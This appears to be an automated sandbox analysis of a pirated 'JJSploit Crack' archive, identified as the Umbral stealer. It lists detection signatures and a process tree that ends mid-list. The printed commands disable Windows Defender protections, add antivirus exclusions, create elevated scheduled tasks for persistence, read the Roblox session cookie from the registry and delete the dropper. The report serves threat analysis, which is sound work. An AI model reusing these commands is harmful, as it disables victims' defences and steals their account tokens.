Overview

overview

10

Static

static

1

JJSploit Crack.zip

windows10-2004-x64

10

JJSploit Crack.zip

windows10-ltsc 2021-x64

1

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-01-2025 15:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JJSploit Crack.zip

  • Size

    56.5MB

  • MD5

    2409d91e52e3ed4d5a1eb89b0f19f3a6

  • SHA1

    b1986ad365de438a3333fb61528925340b801f67

  • SHA256

    a078da52265b2ba4e13c6dee4f3eaac668c467462864515eed89df5690aedd0e

  • SHA512

    154b51b36091b428ba901a7bc4b27f14ff4617ec7ea30e988ace7efc7f89e161e22434c12e62c3388655ee656a6f359ec74516f22c9a4f4fa55bb98c01948059

  • SSDEEP

    786432:Z3py3HgxrHlvVlBPBAWbeBlbsrxJBc8054NmuPDZ3YaC+LEJd4a/7RHJVIXli7C4:W3H8HB71B1SBlbsrtPDZ3juHjF0XuC4

Score
10/10
umbraldiscoveryexecutionpersistenceprivilege_escalationspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 5 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

    persistenceprivilege_escalation
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\JJSploit Crack.zip"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2668
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3256
    • C:\Users\Admin\Desktop\JJSploit\start.exe
      "C:\Users\Admin\Desktop\JJSploit\start.exe"
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Users\Admin\AppData\Local\Temp\Client.exe
        "C:\Users\Admin\AppData\Local\Temp\Client.exe"
        2⤵
        • Modifies WinLogon for persistence
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3748
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "JJsploit" /tr "C:\Windows\xdwdWPS.exe" & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3840
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "JJsploit" /tr "C:\Windows\xdwdWPS.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:792
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2832
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "nextup" /tr "C:\Users\Admin\xdwdSkype.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo 5 /tn "nextup" /tr "C:\Users\Admin\xdwdSkype.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2924
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4052
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4964
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3652
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4392
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4960
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4736
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1788
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2704
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4036
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2480
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
          3⤵
            PID:4376
            • C:\Windows\system32\schtasks.exe
              SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2816
          • C:\Windows\SYSTEM32\CMD.exe
            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
            3⤵
              PID:612
              • C:\Windows\system32\schtasks.exe
                SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3272
            • C:\Windows\SYSTEM32\CMD.exe
              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
              3⤵
                PID:3612
                • C:\Windows\system32\schtasks.exe
                  SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                  4⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4792
              • C:\Windows\SYSTEM32\CMD.exe
                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                3⤵
                  PID:2328
                  • C:\Windows\system32\schtasks.exe
                    SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                    4⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2864
                • C:\Windows\SYSTEM32\CMD.exe
                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                  3⤵
                    PID:4924
                    • C:\Windows\system32\schtasks.exe
                      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                      4⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:1176
                  • C:\Windows\SYSTEM32\CMD.exe
                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                    3⤵
                      PID:1828
                      • C:\Windows\system32\schtasks.exe
                        SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                        4⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1712
                    • C:\Windows\SYSTEM32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                      3⤵
                        PID:2116
                        • C:\Windows\system32\schtasks.exe
                          SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                          4⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:4880
                      • C:\Windows\SYSTEM32\CMD.exe
                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                        3⤵
                          PID:1528
                          • C:\Windows\system32\schtasks.exe
                            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                            4⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:412
                        • C:\Windows\SYSTEM32\CMD.exe
                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                          3⤵
                            PID:4504
                            • C:\Windows\system32\schtasks.exe
                              SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:2396
                          • C:\Windows\SYSTEM32\CMD.exe
                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                            3⤵
                              PID:3608
                              • C:\Windows\system32\schtasks.exe
                                SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                4⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:2560
                            • C:\Windows\SYSTEM32\CMD.exe
                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                              3⤵
                                PID:4692
                                • C:\Windows\system32\schtasks.exe
                                  SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1172
                              • C:\Windows\SYSTEM32\CMD.exe
                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                3⤵
                                  PID:4008
                                  • C:\Windows\system32\schtasks.exe
                                    SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:4416
                                • C:\Windows\SYSTEM32\CMD.exe
                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                  3⤵
                                    PID:876
                                    • C:\Windows\system32\schtasks.exe
                                      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1836
                                  • C:\Windows\SYSTEM32\CMD.exe
                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                    3⤵
                                      PID:2396
                                      • C:\Windows\system32\schtasks.exe
                                        SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:832
                                    • C:\Windows\SYSTEM32\CMD.exe
                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                      3⤵
                                        PID:1368
                                        • C:\Windows\system32\schtasks.exe
                                          SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2292
                                      • C:\Windows\SYSTEM32\CMD.exe
                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                        3⤵
                                          PID:1016
                                          • C:\Windows\system32\schtasks.exe
                                            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                            4⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2368
                                        • C:\Windows\SYSTEM32\CMD.exe
                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                          3⤵
                                            PID:4064
                                            • C:\Windows\system32\schtasks.exe
                                              SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                              4⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:4216
                                          • C:\Windows\SYSTEM32\CMD.exe
                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                            3⤵
                                              PID:3740
                                              • C:\Windows\system32\schtasks.exe
                                                SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                4⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:3980
                                            • C:\Windows\SYSTEM32\CMD.exe
                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                              3⤵
                                                PID:3100
                                                • C:\Windows\system32\schtasks.exe
                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                  4⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1344
                                              • C:\Windows\SYSTEM32\CMD.exe
                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                3⤵
                                                  PID:2816
                                                  • C:\Windows\system32\schtasks.exe
                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                    4⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1848
                                                • C:\Windows\SYSTEM32\CMD.exe
                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                  3⤵
                                                    PID:4944
                                                    • C:\Windows\system32\schtasks.exe
                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                      4⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:4052
                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                    3⤵
                                                      PID:4824
                                                      • C:\Windows\system32\schtasks.exe
                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                        4⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:3740
                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                      3⤵
                                                        PID:2368
                                                        • C:\Windows\system32\schtasks.exe
                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                          4⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:728
                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                        3⤵
                                                          PID:4036
                                                          • C:\Windows\system32\schtasks.exe
                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4616
                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                          3⤵
                                                            PID:2292
                                                            • C:\Windows\system32\schtasks.exe
                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4780
                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                            3⤵
                                                              PID:208
                                                              • C:\Windows\system32\schtasks.exe
                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:3936
                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                              3⤵
                                                                PID:2436
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                                  4⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4104
                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                                3⤵
                                                                  PID:2704
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                                    4⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:4020
                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                                  3⤵
                                                                    PID:1564
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                                      4⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4260
                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
                                                                    3⤵
                                                                      PID:4236
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
                                                                        4⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:1884
                                                                  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                    2⤵
                                                                    • Drops file in Drivers directory
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:396
                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                      3⤵
                                                                      • Views/modifies file attributes
                                                                      PID:4904
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                      3⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:868
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                      3⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:756
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      3⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2532
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      3⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4944
                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                      "wmic.exe" os get Caption
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2024
                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                      "wmic.exe" computersystem get totalphysicalmemory
                                                                      3⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2928
                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                      "wmic.exe" csproduct get uuid
                                                                      3⤵
                                                                        PID:3480
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4924
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic" path win32_VideoController get name
                                                                        3⤵
                                                                        • Detects videocard installed
                                                                        PID:1312
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                        3⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4380
                                                                        • C:\Windows\system32\PING.EXE
                                                                          ping localhost
                                                                          4⤵
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:2172
                                                                  • C:\Users\Admin\Desktop\JJSploit\start.exe
                                                                    "C:\Users\Admin\Desktop\JJSploit\start.exe"
                                                                    1⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4796
                                                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                      2⤵
                                                                      • Drops file in Drivers directory
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4396
                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                        3⤵
                                                                        • Views/modifies file attributes
                                                                        PID:4400
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4976
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1236
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
